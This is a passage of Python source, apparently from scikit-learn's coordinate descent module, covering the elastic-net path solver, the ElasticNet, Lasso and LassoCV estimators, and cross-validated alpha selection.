        reach the specified tolerance for each alpha.
        (Is returned when ``return_n_iter`` is set to True).

    Notes
    -----
    See examples/plot_lasso_coordinate_descent_path.py for an example.

    See also
    --------
    MultiTaskElasticNet
    MultiTaskElasticNetCV
    ElasticNet
    ElasticNetCV
    """
    # Fortran (column-major) order is what the Cython CD solvers expect.
    X = check_array(X, 'csc', dtype=np.float64, order='F', copy=copy_X)
    y = check_array(y, 'csc', dtype=np.float64, order='F', copy=False, ensure_2d=False)
    if Xy is not None:
        Xy = check_array(Xy, 'csc', dtype=np.float64, order='F', copy=False,
                         ensure_2d=False)
    n_samples, n_features = X.shape
    multi_output = False
    if y.ndim != 1:
        multi_output = True
        _, n_outputs = y.shape
    # MultiTaskElasticNet does not support sparse matrices
    if not multi_output and sparse.isspmatrix(X):
        if 'X_mean' in params:
            # As sparse matrices are not actually centered we need this
            # to be passed to the CD solver.
            X_sparse_scaling = params['X_mean'] / params['X_std']
        else:
            X_sparse_scaling = np.zeros(n_features)
    # X should be normalized and fit already.
    X, y, X_mean, y_mean, X_std, precompute, Xy = \
        _pre_fit(X, y, Xy, precompute, normalize=False, fit_intercept=False,
                 copy=False)
    if alphas is None:
        # No need to normalize of fit_intercept: it has been done
        # above
        alphas = _alpha_grid(X, y, Xy=Xy, l1_ratio=l1_ratio,
                             fit_intercept=False, eps=eps, n_alphas=n_alphas,
                             normalize=False, copy_X=False)
    else:
        alphas = np.sort(alphas)[::-1]  # make sure alphas are properly ordered
    n_alphas = len(alphas)
    tol = params.get('tol', 1e-4)
    max_iter = params.get('max_iter', 1000)
    dual_gaps = np.empty(n_alphas)
    n_iters = []
    rng = check_random_state(params.get('random_state', None))
    selection = params.get('selection', 'cyclic')
    if selection not in ['random', 'cyclic']:
        raise ValueError("selection should be either random or cyclic.")
    random = (selection == 'random')
    if not multi_output:
        coefs = np.empty((n_features, n_alphas), dtype=np.float64)
    else:
        coefs = np.empty((n_outputs, n_features, n_alphas),
                         dtype=np.float64)
    if coef_init is None:
        coef_ = np.asfortranarray(np.zeros(coefs.shape[:-1]))
    else:
        coef_ = np.asfortranarray(coef_init)
    for i, alpha in enumerate(alphas):
        # The CD solvers expect penalties pre-scaled by n_samples.
        l1_reg = alpha * l1_ratio * n_samples
        l2_reg = alpha * (1.0 - l1_ratio) * n_samples
        # Dispatch on input kind: sparse mono-output, dense multi-output,
        # precomputed Gram matrix, or plain dense mono-output.
        if not multi_output and sparse.isspmatrix(X):
            model = cd_fast.sparse_enet_coordinate_descent(
                coef_, l1_reg, l2_reg, X.data, X.indices,
                X.indptr, y, X_sparse_scaling,
                max_iter, tol, rng, random, positive)
        elif multi_output:
            model = cd_fast.enet_coordinate_descent_multi_task(
                coef_, l1_reg, l2_reg, X, y, max_iter, tol, rng, random)
        elif isinstance(precompute, np.ndarray):
            precompute = check_array(precompute, 'csc', dtype=np.float64, order='F')
            model = cd_fast.enet_coordinate_descent_gram(
                coef_, l1_reg, l2_reg, precompute, Xy, y, max_iter,
                tol, rng, random, positive)
        elif precompute is False:
            model = cd_fast.enet_coordinate_descent(
                coef_, l1_reg, l2_reg, X, y, max_iter, tol, rng, random,
                positive)
        else:
            raise ValueError("Precompute should be one of True, False, "
                             "'auto' or array-like")
        coef_, dual_gap_, eps_, n_iter_ = model
        # Warm start: coef_ carries over to the next (smaller) alpha.
        coefs[..., i] = coef_
        dual_gaps[i] = dual_gap_
        n_iters.append(n_iter_)
        if dual_gap_ > eps_:
            warnings.warn('Objective did not converge.' +
                          ' You might want' +
                          ' to increase the number of iterations',
                          ConvergenceWarning)
        if verbose:
            if verbose > 2:
                print(model)
            elif verbose > 1:
                print('Path: %03i out of %03i' % (i, n_alphas))
            else:
                sys.stderr.write('.')
    if return_n_iter:
        return alphas, coefs, dual_gaps, n_iters
    return alphas, coefs, dual_gaps
###############################################################################
# ElasticNet model
class ElasticNet(LinearModel, RegressorMixin):
    """Linear regression with combined L1 and L2 priors as regularizer.

    Minimizes the objective function::

            1 / (2 * n_samples) * ||y - Xw||^2_2 +
            + alpha * l1_ratio * ||w||_1
            + 0.5 * alpha * (1 - l1_ratio) * ||w||^2_2

    If you are interested in controlling the L1 and L2 penalty
    separately, keep in mind that this is equivalent to::

            a * L1 + b * L2

    where::

            alpha = a + b and l1_ratio = a / (a + b)

    The parameter l1_ratio corresponds to alpha in the glmnet R package while
    alpha corresponds to the lambda parameter in glmnet. Specifically, l1_ratio
    = 1 is the lasso penalty. Currently, l1_ratio <= 0.01 is not reliable,
    unless you supply your own sequence of alpha.

    Read more in the :ref:`User Guide <elastic_net>`.

    Parameters
    ----------
    alpha : float
        Constant that multiplies the penalty terms. Defaults to 1.0
        See the notes for the exact mathematical meaning of this
        parameter.
        ``alpha = 0`` is equivalent to an ordinary least square, solved
        by the :class:`LinearRegression` object. For numerical
        reasons, using ``alpha = 0`` with the Lasso object is not advised
        and you should prefer the LinearRegression object.

    l1_ratio : float
        The ElasticNet mixing parameter, with ``0 <= l1_ratio <= 1``. For
        ``l1_ratio = 0`` the penalty is an L2 penalty. For ``l1_ratio = 1`` it
        is an L1 penalty. For ``0 < l1_ratio < 1``, the penalty is a
        combination of L1 and L2.

    fit_intercept : bool
        Whether the intercept should be estimated or not. If ``False``, the
        data is assumed to be already centered.

    normalize : boolean, optional, default False
        If ``True``, the regressors X will be normalized before regression.

    precompute : True | False | 'auto' | array-like
        Whether to use a precomputed Gram matrix to speed up
        calculations. If set to ``'auto'`` let us decide. The Gram
        matrix can also be passed as argument. For sparse input
        this option is always ``True`` to preserve sparsity.
        WARNING : The ``'auto'`` option is deprecated and will
        be removed in 0.18.

    max_iter : int, optional
        The maximum number of iterations

    copy_X : boolean, optional, default True
        If ``True``, X will be copied; else, it may be overwritten.

    tol : float, optional
        The tolerance for the optimization: if the updates are
        smaller than ``tol``, the optimization code checks the
        dual gap for optimality and continues until it is smaller
        than ``tol``.

    warm_start : bool, optional
        When set to ``True``, reuse the solution of the previous call to fit as
        initialization, otherwise, just erase the previous solution.

    positive : bool, optional
        When set to ``True``, forces the coefficients to be positive.

    selection : str, default 'cyclic'
        If set to 'random', a random coefficient is updated every iteration
        rather than looping over features sequentially by default. This
        (setting to 'random') often leads to significantly faster convergence
        especially when tol is higher than 1e-4.

    random_state : int, RandomState instance, or None (default)
        The seed of the pseudo random number generator that selects
        a random feature to update. Useful only when selection is set to
        'random'.

    Attributes
    ----------
    coef_ : array, shape (n_features,) | (n_targets, n_features)
        parameter vector (w in the cost function formula)

    sparse_coef_ : scipy.sparse matrix, shape (n_features, 1) | \
            (n_targets, n_features)
        ``sparse_coef_`` is a readonly property derived from ``coef_``

    intercept_ : float | array, shape (n_targets,)
        independent term in decision function.

    n_iter_ : array-like, shape (n_targets,)
        number of iterations run by the coordinate descent solver to reach
        the specified tolerance.

    Notes
    -----
    To avoid unnecessary memory duplication the X argument of the fit method
    should be directly passed as a Fortran-contiguous numpy array.

    See also
    --------
    SGDRegressor: implements elastic net regression with incremental training.
    SGDClassifier: implements logistic regression with elastic net penalty
        (``SGDClassifier(loss="log", penalty="elasticnet")``).
    """
    # Coordinate-descent path function shared by this class and its
    # subclasses (e.g. Lasso overrides nothing but the default l1_ratio).
    path = staticmethod(enet_path)

    def __init__(self, alpha=1.0, l1_ratio=0.5, fit_intercept=True,
                 normalize=False, precompute=False, max_iter=1000,
                 copy_X=True, tol=1e-4, warm_start=False, positive=False,
                 random_state=None, selection='cyclic'):
        self.alpha = alpha
        self.l1_ratio = l1_ratio
        # coef_ is None until fit; warm_start checks this to decide whether
        # a previous solution is available.
        self.coef_ = None
        self.fit_intercept = fit_intercept
        self.normalize = normalize
        self.precompute = precompute
        self.max_iter = max_iter
        self.copy_X = copy_X
        self.tol = tol
        self.warm_start = warm_start
        self.positive = positive
        self.intercept_ = 0.0
        self.random_state = random_state
        self.selection = selection

    def fit(self, X, y):
        """Fit model with coordinate descent.

        Parameters
        -----------
        X : ndarray or scipy.sparse matrix, (n_samples, n_features)
            Data

        y : ndarray, shape (n_samples,) or (n_samples, n_targets)
            Target

        Notes
        -----
        Coordinate descent is an algorithm that considers each column of
        data at a time hence it will automatically convert the X input
        as a Fortran-contiguous numpy array if necessary.

        To avoid memory re-allocation it is advised to allocate the
        initial data in memory directly using that format.
        """
        # alpha=0 amounts to ordinary least squares, for which coordinate
        # descent converges poorly; steer users towards LinearRegression.
        if self.alpha == 0:
            warnings.warn("With alpha=0, this algorithm does not converge "
                          "well. You are advised to use the LinearRegression "
                          "estimator", stacklevel=2)

        if self.precompute == 'auto':
            warnings.warn("Setting precompute to 'auto', was found to be "
                          "slower even when n_samples > n_features. Hence "
                          "it will be removed in 0.18.",
                          DeprecationWarning, stacklevel=2)

        X, y = check_X_y(X, y, accept_sparse='csc', dtype=np.float64,
                         order='F', copy=self.copy_X and self.fit_intercept,
                         multi_output=True, y_numeric=True)

        # Center / normalize the data and (optionally) precompute the Gram
        # matrix and X^T.y once, so each per-target path fit can reuse them.
        X, y, X_mean, y_mean, X_std, precompute, Xy = \
            _pre_fit(X, y, None, self.precompute, self.normalize,
                     self.fit_intercept, copy=True)

        # Promote 1-d targets to 2-d so single- and multi-output are handled
        # uniformly by the per-target loop below.
        if y.ndim == 1:
            y = y[:, np.newaxis]
        if Xy is not None and Xy.ndim == 1:
            Xy = Xy[:, np.newaxis]

        n_samples, n_features = X.shape
        n_targets = y.shape[1]

        if self.selection not in ['cyclic', 'random']:
            raise ValueError("selection should be either random or cyclic.")

        # Warm-start from the previous coefficients when requested,
        # otherwise start the descent from zero.
        if not self.warm_start or self.coef_ is None:
            coef_ = np.zeros((n_targets, n_features), dtype=np.float64,
                             order='F')
        else:
            coef_ = self.coef_
            if coef_.ndim == 1:
                coef_ = coef_[np.newaxis, :]

        dual_gaps_ = np.zeros(n_targets, dtype=np.float64)

        self.n_iter_ = []

        # Fit one single-alpha coordinate-descent path per target column.
        for k in xrange(n_targets):
            if Xy is not None:
                this_Xy = Xy[:, k]
            else:
                this_Xy = None
            _, this_coef, this_dual_gap, this_iter = \
                self.path(X, y[:, k],
                          l1_ratio=self.l1_ratio, eps=None,
                          n_alphas=None, alphas=[self.alpha],
                          precompute=precompute, Xy=this_Xy,
                          fit_intercept=False, normalize=False, copy_X=True,
                          verbose=False, tol=self.tol, positive=self.positive,
                          X_mean=X_mean, X_std=X_std, return_n_iter=True,
                          coef_init=coef_[k], max_iter=self.max_iter,
                          random_state=self.random_state,
                          selection=self.selection)
            coef_[k] = this_coef[:, 0]
            dual_gaps_[k] = this_dual_gap[0]
            self.n_iter_.append(this_iter[0])

        # Single-output models expose a scalar n_iter_ rather than a list.
        if n_targets == 1:
            self.n_iter_ = self.n_iter_[0]

        self.coef_, self.dual_gap_ = map(np.squeeze, [coef_, dual_gaps_])
        self._set_intercept(X_mean, y_mean, X_std)

        # return self for chaining fit and predict calls
        return self

    @property
    def sparse_coef_(self):
        """ sparse representation of the fitted coef """
        return sparse.csr_matrix(self.coef_)

    @deprecated(" and will be removed in 0.19")
    def decision_function(self, X):
        """Decision function of the linear model

        Parameters
        ----------
        X : numpy array or scipy.sparse matrix of shape (n_samples, n_features)

        Returns
        -------
        T : array, shape (n_samples,)
            The predicted decision function
        """
        return self._decision_function(X)

    def _decision_function(self, X):
        """Decision function of the linear model

        Parameters
        ----------
        X : numpy array or scipy.sparse matrix of shape (n_samples, n_features)

        Returns
        -------
        T : array, shape (n_samples,)
            The predicted decision function
        """
        check_is_fitted(self, 'n_iter_')
        # Fast path for sparse X: multiply without densifying the input.
        if sparse.isspmatrix(X):
            return np.ravel(safe_sparse_dot(self.coef_, X.T, dense_output=True)
                            + self.intercept_)
        else:
            return super(ElasticNet, self)._decision_function(X)
###############################################################################
# Lasso model
class Lasso(ElasticNet):
    """Linear Model trained with L1 prior as regularizer (aka the Lasso)

    The optimization objective for Lasso is::

        (1 / (2 * n_samples)) * ||y - Xw||^2_2 + alpha * ||w||_1

    Technically the Lasso model is optimizing the same objective function as
    the Elastic Net with ``l1_ratio=1.0`` (no L2 penalty).

    Read more in the :ref:`User Guide <lasso>`.

    Parameters
    ----------
    alpha : float, optional
        Constant that multiplies the L1 term. Defaults to 1.0.
        ``alpha = 0`` is equivalent to an ordinary least square, solved
        by the :class:`LinearRegression` object. For numerical
        reasons, using ``alpha = 0`` with the Lasso object is not advised
        and you should prefer the LinearRegression object.

    fit_intercept : boolean
        whether to calculate the intercept for this model. If set
        to false, no intercept will be used in calculations
        (e.g. data is expected to be already centered).

    normalize : boolean, optional, default False
        If ``True``, the regressors X will be normalized before regression.

    copy_X : boolean, optional, default True
        If ``True``, X will be copied; else, it may be overwritten.

    precompute : True | False | 'auto' | array-like
        Whether to use a precomputed Gram matrix to speed up
        calculations. If set to ``'auto'`` let us decide. The Gram
        matrix can also be passed as argument. For sparse input
        this option is always ``True`` to preserve sparsity.
        WARNING : The ``'auto'`` option is deprecated and will
        be removed in 0.18.

    max_iter : int, optional
        The maximum number of iterations

    tol : float, optional
        The tolerance for the optimization: if the updates are
        smaller than ``tol``, the optimization code checks the
        dual gap for optimality and continues until it is smaller
        than ``tol``.

    warm_start : bool, optional
        When set to True, reuse the solution of the previous call to fit as
        initialization, otherwise, just erase the previous solution.

    positive : bool, optional
        When set to ``True``, forces the coefficients to be positive.

    selection : str, default 'cyclic'
        If set to 'random', a random coefficient is updated every iteration
        rather than looping over features sequentially by default. This
        (setting to 'random') often leads to significantly faster convergence
        especially when tol is higher than 1e-4.

    random_state : int, RandomState instance, or None (default)
        The seed of the pseudo random number generator that selects
        a random feature to update. Useful only when selection is set to
        'random'.

    Attributes
    ----------
    coef_ : array, shape (n_features,) | (n_targets, n_features)
        parameter vector (w in the cost function formula)

    sparse_coef_ : scipy.sparse matrix, shape (n_features, 1) | \
            (n_targets, n_features)
        ``sparse_coef_`` is a readonly property derived from ``coef_``

    intercept_ : float | array, shape (n_targets,)
        independent term in decision function.

    n_iter_ : int | array-like, shape (n_targets,)
        number of iterations run by the coordinate descent solver to reach
        the specified tolerance.

    Examples
    --------
    >>> from sklearn import linear_model
    >>> clf = linear_model.Lasso(alpha=0.1)
    >>> clf.fit([[0,0], [1, 1], [2, 2]], [0, 1, 2])
    Lasso(alpha=0.1, copy_X=True, fit_intercept=True, max_iter=1000,
       normalize=False, positive=False, precompute=False, random_state=None,
       selection='cyclic', tol=0.0001, warm_start=False)
    >>> print(clf.coef_)
    [ 0.85  0.  ]
    >>> print(clf.intercept_)
    0.15

    See also
    --------
    lars_path
    lasso_path
    LassoLars
    LassoCV
    LassoLarsCV
    sklearn.decomposition.sparse_encode

    Notes
    -----
    The algorithm used to fit the model is coordinate descent.

    To avoid unnecessary memory duplication the X argument of the fit method
    should be directly passed as a Fortran-contiguous numpy array.
    """
    # Reuse the elastic-net coordinate-descent path; with l1_ratio pinned to
    # 1.0 in __init__ the penalty reduces to pure L1.
    path = staticmethod(enet_path)

    def __init__(self, alpha=1.0, fit_intercept=True, normalize=False,
                 precompute=False, copy_X=True, max_iter=1000,
                 tol=1e-4, warm_start=False, positive=False,
                 random_state=None, selection='cyclic'):
        # Lasso is ElasticNet with the mixing parameter fixed at l1_ratio=1.0;
        # everything else is forwarded unchanged.
        super(Lasso, self).__init__(
            alpha=alpha, l1_ratio=1.0, fit_intercept=fit_intercept,
            normalize=normalize, precompute=precompute, copy_X=copy_X,
            max_iter=max_iter, tol=tol, warm_start=warm_start,
            positive=positive, random_state=random_state,
            selection=selection)
###############################################################################
# Functions for CV with paths functions
def _path_residuals(X, y, train, test, path, path_params, alphas=None,
                    l1_ratio=1, X_order=None, dtype=None):
    """Returns the MSE for the models computed by 'path'

    Parameters
    ----------
    X : {array-like, sparse matrix}, shape (n_samples, n_features)
        Training data.

    y : array-like, shape (n_samples,) or (n_samples, n_targets)
        Target values

    train : list of indices
        The indices of the train set

    test : list of indices
        The indices of the test set

    path : callable
        function returning a list of models on the path. See
        enet_path for an example of signature

    path_params : dictionary
        Parameters passed to the path function

    alphas : array-like, optional
        Array of float that is used for cross-validation. If not
        provided, computed using 'path'

    l1_ratio : float, optional
        float between 0 and 1 passed to ElasticNet (scaling between
        l1 and l2 penalties). For ``l1_ratio = 0`` the penalty is an
        L2 penalty. For ``l1_ratio = 1`` it is an L1 penalty. For ``0
        < l1_ratio < 1``, the penalty is a combination of L1 and L2

    X_order : {'F', 'C', or None}, optional
        The order of the arrays expected by the path function to
        avoid memory copies

    dtype : a numpy dtype or None
        The dtype of the arrays expected by the path function to
        avoid memory copies

    Returns
    -------
    this_mses : array, shape (n_alphas,)
        Mean squared error of the path's models on the test fold, one value
        per alpha (averaged over samples and over targets).
    """
    X_train = X[train]
    y_train = y[train]
    X_test = X[test]
    y_test = y[test]
    fit_intercept = path_params['fit_intercept']
    normalize = path_params['normalize']

    if y.ndim == 1:
        precompute = path_params['precompute']
    else:
        # No Gram variant of multi-task exists right now.
        # Fall back to default enet_multitask
        precompute = False

    # Center / normalize only the training fold; the resulting statistics
    # (X_mean, y_mean, X_std) are used below to score the raw test fold.
    X_train, y_train, X_mean, y_mean, X_std, precompute, Xy = \
        _pre_fit(X_train, y_train, None, precompute, normalize, fit_intercept,
                 copy=False)

    path_params = path_params.copy()
    path_params['Xy'] = Xy
    path_params['X_mean'] = X_mean
    path_params['X_std'] = X_std
    path_params['precompute'] = precompute
    path_params['copy_X'] = False
    path_params['alphas'] = alphas

    if 'l1_ratio' in path_params:
        path_params['l1_ratio'] = l1_ratio

    # Do the ordering and type casting here, as if it is done in the path,
    # X is copied and a reference is kept here
    X_train = check_array(X_train, 'csc', dtype=dtype, order=X_order)
    alphas, coefs, _ = path(X_train, y_train, **path_params)
    del X_train, y_train

    if y.ndim == 1:
        # Doing this so that it becomes coherent with multioutput.
        coefs = coefs[np.newaxis, :, :]
        y_mean = np.atleast_1d(y_mean)
        y_test = y_test[:, np.newaxis]

    if normalize:
        # Undo the training-fold column scaling so the coefficients apply
        # directly to the unscaled X_test.
        nonzeros = np.flatnonzero(X_std)
        coefs[:, nonzeros] /= X_std[nonzeros][:, np.newaxis]

    # Intercepts recovered from the centering statistics of the train fold.
    intercepts = y_mean[:, np.newaxis] - np.dot(X_mean, coefs)
    if sparse.issparse(X_test):
        n_order, n_features, n_alphas = coefs.shape
        # Work around for sparse matrices since coefs is a 3-D numpy array.
        coefs_feature_major = np.rollaxis(coefs, 1)
        feature_2d = np.reshape(coefs_feature_major, (n_features, -1))
        X_test_coefs = safe_sparse_dot(X_test, feature_2d)
        X_test_coefs = X_test_coefs.reshape(X_test.shape[0], n_order, -1)
    else:
        X_test_coefs = safe_sparse_dot(X_test, coefs)
    # residues = (X.w + intercept) - y, per target and per alpha.
    residues = X_test_coefs - y_test[:, :, np.newaxis]
    residues += intercepts
    this_mses = ((residues ** 2).mean(axis=0)).mean(axis=0)

    return this_mses
class LinearModelCV(six.with_metaclass(ABCMeta, LinearModel)):
    """Base class for iterative model fitting along a regularization path.

    Concrete subclasses (LassoCV, ElasticNetCV, MultiTask*CV) provide the
    ``path`` static method and their own hyper-parameter defaults; ``fit``
    below does the shared cross-validated model selection.
    """

    @abstractmethod
    def __init__(self, eps=1e-3, n_alphas=100, alphas=None, fit_intercept=True,
                 normalize=False, precompute='auto', max_iter=1000, tol=1e-4,
                 copy_X=True, cv=None, verbose=False, n_jobs=1,
                 positive=False, random_state=None, selection='cyclic'):
        # Hyper-parameters are stored verbatim, per the scikit-learn
        # estimator convention (no validation or conversion in __init__).
        self.eps = eps
        self.n_alphas = n_alphas
        self.alphas = alphas
        self.fit_intercept = fit_intercept
        self.normalize = normalize
        self.precompute = precompute
        self.max_iter = max_iter
        self.tol = tol
        self.copy_X = copy_X
        self.cv = cv
        self.verbose = verbose
        self.n_jobs = n_jobs
        self.positive = positive
        self.random_state = random_state
        self.selection = selection

    def fit(self, X, y):
        """Fit linear model with coordinate descent

        Fit is on grid of alphas and best alpha estimated by cross-validation.

        Parameters
        ----------
        X : {array-like}, shape (n_samples, n_features)
            Training data. Pass directly as float64, Fortran-contiguous data
            to avoid unnecessary memory duplication. If y is mono-output,
            X can be sparse.

        y : array-like, shape (n_samples,) or (n_samples, n_targets)
            Target values
        """
        y = np.asarray(y, dtype=np.float64)
        if y.shape[0] == 0:
            raise ValueError("y has 0 samples: %r" % y)

        # Pick the (single- or multi-task) estimator matching the concrete
        # subclass; it is refit at the end with the best parameters found.
        if hasattr(self, 'l1_ratio'):
            model_str = 'ElasticNet'
        else:
            model_str = 'Lasso'
        if isinstance(self, ElasticNetCV) or isinstance(self, LassoCV):
            if model_str == 'ElasticNet':
                model = ElasticNet()
            else:
                model = Lasso()
            if y.ndim > 1 and y.shape[1] > 1:
                raise ValueError("For multi-task outputs, use "
                                 "MultiTask%sCV" % (model_str))
            y = column_or_1d(y, warn=True)
        else:
            if sparse.isspmatrix(X):
                # BUGFIX: the two concatenated literals previously produced
                # the message "...a sparse matrix waspassed" (missing space).
                raise TypeError("X should be dense but a sparse matrix was "
                                "passed")
            elif y.ndim == 1:
                raise ValueError("For mono-task outputs, use "
                                 "%sCV" % (model_str))
            if model_str == 'ElasticNet':
                model = MultiTaskElasticNet()
            else:
                model = MultiTaskLasso()

        if self.selection not in ["random", "cyclic"]:
            raise ValueError("selection should be either random or cyclic.")

        # This makes sure that there is no duplication in memory.
        # Dealing right with copy_X is important in the following:
        # Multiple functions touch X and subsamples of X and can induce a
        # lot of duplication of memory
        copy_X = self.copy_X and self.fit_intercept

        if isinstance(X, np.ndarray) or sparse.isspmatrix(X):
            # Keep a reference to X
            reference_to_old_X = X
            # Let us not impose fortran ordering or float64 so far: it is
            # not useful for the cross-validation loop and will be done
            # by the model fitting itself
            X = check_array(X, 'csc', copy=False)
            if sparse.isspmatrix(X):
                if not np.may_share_memory(reference_to_old_X.data, X.data):
                    # X is a sparse matrix and has been copied
                    copy_X = False
            elif not np.may_share_memory(reference_to_old_X, X):
                # X has been copied
                copy_X = False
            del reference_to_old_X
        else:
            X = check_array(X, 'csc', dtype=np.float64, order='F', copy=copy_X)
            copy_X = False

        if X.shape[0] != y.shape[0]:
            raise ValueError("X and y have inconsistent dimensions (%d != %d)"
                             % (X.shape[0], y.shape[0]))

        # All LinearModelCV parameters except 'cv' are acceptable
        path_params = self.get_params()
        if 'l1_ratio' in path_params:
            l1_ratios = np.atleast_1d(path_params['l1_ratio'])
            # For the first path, we need to set l1_ratio
            path_params['l1_ratio'] = l1_ratios[0]
        else:
            l1_ratios = [1, ]
        path_params.pop('cv', None)
        path_params.pop('n_jobs', None)

        alphas = self.alphas
        n_l1_ratio = len(l1_ratios)
        if alphas is None:
            # Build one decreasing grid of alphas per candidate l1_ratio.
            alphas = []
            for l1_ratio in l1_ratios:
                alphas.append(_alpha_grid(
                    X, y, l1_ratio=l1_ratio,
                    fit_intercept=self.fit_intercept,
                    eps=self.eps, n_alphas=self.n_alphas,
                    normalize=self.normalize,
                    copy_X=self.copy_X))
        else:
            # Making sure alphas is properly ordered.
            alphas = np.tile(np.sort(alphas)[::-1], (n_l1_ratio, 1))
        # We want n_alphas to be the number of alphas used for each l1_ratio.
        n_alphas = len(alphas[0])
        path_params.update({'n_alphas': n_alphas})

        path_params['copy_X'] = copy_X
        # We are not computing in parallel, we can modify X
        # inplace in the folds
        if not (self.n_jobs == 1 or self.n_jobs is None):
            path_params['copy_X'] = False

        # init cross-validation generator
        cv = check_cv(self.cv, X)

        # Compute path for all folds and compute MSE to get the best alpha
        folds = list(cv)
        best_mse = np.inf

        # We do a double for loop folded in one, in order to be able to
        # iterate in parallel on l1_ratio and folds
        jobs = (delayed(_path_residuals)(X, y, train, test, self.path,
                                         path_params, alphas=this_alphas,
                                         l1_ratio=this_l1_ratio, X_order='F',
                                         dtype=np.float64)
                for this_l1_ratio, this_alphas in zip(l1_ratios, alphas)
                for train, test in folds)
        mse_paths = Parallel(n_jobs=self.n_jobs, verbose=self.verbose,
                             backend="threading")(jobs)
        mse_paths = np.reshape(mse_paths, (n_l1_ratio, len(folds), -1))
        mean_mse = np.mean(mse_paths, axis=1)
        self.mse_path_ = np.squeeze(np.rollaxis(mse_paths, 2, 1))

        # Select the (l1_ratio, alpha) pair with the lowest mean test MSE.
        for l1_ratio, l1_alphas, mse_alphas in zip(l1_ratios, alphas,
                                                   mean_mse):
            i_best_alpha = np.argmin(mse_alphas)
            this_best_mse = mse_alphas[i_best_alpha]
            if this_best_mse < best_mse:
                best_alpha = l1_alphas[i_best_alpha]
                best_l1_ratio = l1_ratio
                best_mse = this_best_mse

        self.l1_ratio_ = best_l1_ratio
        self.alpha_ = best_alpha
        if self.alphas is None:
            self.alphas_ = np.asarray(alphas)
            if n_l1_ratio == 1:
                self.alphas_ = self.alphas_[0]
        # Remove duplicate alphas in case alphas is provided.
        else:
            self.alphas_ = np.asarray(alphas[0])

        # Refit the model with the parameters selected
        common_params = dict((name, value)
                             for name, value in self.get_params().items()
                             if name in model.get_params())
        model.set_params(**common_params)
        model.alpha = best_alpha
        model.l1_ratio = best_l1_ratio
        model.copy_X = copy_X
        model.precompute = False
        model.fit(X, y)
        # Lasso-style subclasses have no l1_ratio; drop the attribute set
        # above so the public surface matches the estimator.
        if not hasattr(self, 'l1_ratio'):
            del self.l1_ratio_
        # Copy the fitted state of the refit model onto self.
        self.coef_ = model.coef_
        self.intercept_ = model.intercept_
        self.dual_gap_ = model.dual_gap_
        self.n_iter_ = model.n_iter_
        return self
class LassoCV(LinearModelCV, RegressorMixin):
    """Lasso linear model with iterative fitting along a regularization path

    The best model is selected by cross-validation.

    The optimization objective for Lasso is::

        (1 / (2 * n_samples)) * ||y - Xw||^2_2 + alpha * ||w||_1

    Read more in the :ref:`User Guide <lasso>`.

    Parameters
    ----------
    eps : float, optional
        Length of the path. ``eps=1e-3`` means that
        ``alpha_min / alpha_max = 1e-3``.

    n_alphas : int, optional
        Number of alphas along the regularization path

    alphas : numpy array, optional
        List of alphas where to compute the models.
        If ``None`` alphas are set automatically

    precompute : True | False | 'auto' | array-like
        Whether to use a precomputed Gram matrix to speed up
        calculations. If set to ``'auto'`` let us decide. The Gram
        matrix can also be passed as argument.

    max_iter : int, optional
        The maximum number of iterations

    tol : float, optional
        The tolerance for the optimization: if the updates are
        smaller than ``tol``, the optimization code checks the
        dual gap for optimality and continues until it is smaller
        than ``tol``.

    cv : integer or cross-validation generator, optional
        If an integer is passed, it is the number of fold (default 3).
        Specific cross-validation objects can be passed, see the
        :mod:`sklearn.cross_validation` module for the list of possible
        objects.

    verbose : bool or integer
        Amount of verbosity.

    n_jobs : integer, optional
        Number of CPUs to use during the cross validation. If ``-1``, use
        all the CPUs.

    positive : bool, optional
        If positive, restrict regression coefficients to be positive

    selection : str, default 'cyclic'
        If set to 'random', a random coefficient is updated every iteration
        rather than looping over features sequentially by default. This
        (setting to 'random') often leads to significantly faster convergence
        especially when tol is higher than 1e-4.

    random_state : int, RandomState instance, or None (default)
        The seed of the pseudo random number generator that selects
        a random feature to update. Useful only when selection is set to
        'random'.

    fit_intercept : boolean, default True
        whether to calculate the intercept for this model. If set
        to false, no intercept will be used in calculations
        (e.g. data is expected to be already centered).

    normalize : boolean, optional, default False
        If ``True``, the regressors X will be normalized before regression.

    copy_X : boolean, optional, default True
        If ``True``, X will be copied; else, it may be overwritten.

    Attributes
    ----------
    alpha_ : float
        The amount of penalization chosen by cross validation

    coef_ : array, shape (n_features,) | (n_targets, n_features)
        parameter vector (w in the cost function formula)

    intercept_ : float | array, shape (n_targets,)
        independent term in decision function.

    mse_path_ : array, shape (n_alphas, n_folds)
        mean square error for the test set on each fold, varying alpha

    alphas_ : numpy array, shape (n_alphas,)
        The grid of alphas used for fitting

    dual_gap_ : ndarray, shape ()
        The dual gap at the end of the optimization for the optimal alpha
        (``alpha_``).

    n_iter_ : int
        number of iterations run by the coordinate descent solver to reach
        the specified tolerance for the optimal alpha.

    Notes
    -----
    See examples/linear_model/lasso_path_with_crossvalidation.py
    for an example.

    To avoid unnecessary memory duplication the X argument of the fit method
    should be directly passed as a Fortran-contiguous numpy array.

    See also
    --------
    lars_path
    lasso_path
    LassoLars
    Lasso
    LassoLarsCV
    """
    # Path function used by LinearModelCV.fit for the per-fold model fits.
    path = staticmethod(lasso_path)

    def __init__(self, eps=1e-3, n_alphas=100, alphas=None, fit_intercept=True,
                 normalize=False, precompute='auto', max_iter=1000, tol=1e-4,
                 copy_X=True, cv=None, verbose=False, n_jobs=1,
                 positive=False, random_state=None, selection='cyclic'):
        # All parameters are forwarded verbatim to LinearModelCV, which
        # implements the cross-validated fit.
        super(LassoCV, self).__init__(
            eps=eps, n_alphas=n_alphas, alphas=alphas,
            fit_intercept=fit_intercept, normalize=normalize,
            precompute=precompute, max_iter=max_iter, tol=tol, copy_X=copy_X,
            cv=cv, verbose=verbose, n_jobs=n_jobs, positive=positive,
            random_state=random_state, selection=selection)
class ElasticNetCV(LinearModelCV, RegressorMixin):
    """Elastic Net model with iterative fitting along a regularization path

    The best model is selected by cross-validation.

    Read more in the :ref:`User Guide <elastic_net>`.

    Parameters
    ----------
    l1_ratio : float, optional
        float between 0 and 1 passed to ElasticNet (scaling between
        l1 and l2 penalties). For ``l1_ratio = 0``
        the penalty is an L2 penalty. For ``l1_ratio = 1`` it is an L1 penalty.
        For ``0 < l1_ratio < 1``, the penalty is a combination of L1 and L2
        This parameter can be a list, in which case the different
        values are tested by cross-validation and the one giving the best
        prediction score is used. Note that a good choice of list of
        values for l1_ratio is often to put more values close to 1
        (i.e. Lasso) and less close to 0 (i.e. Ridge), as in ``[.1, .5, .7,
        .9, .95, .99, 1]``

    eps : float, optional
        Length of the path. ``eps=1e-3`` means that
        ``alpha_min / alpha_max = 1e-3``.

    n_alphas : int, optional
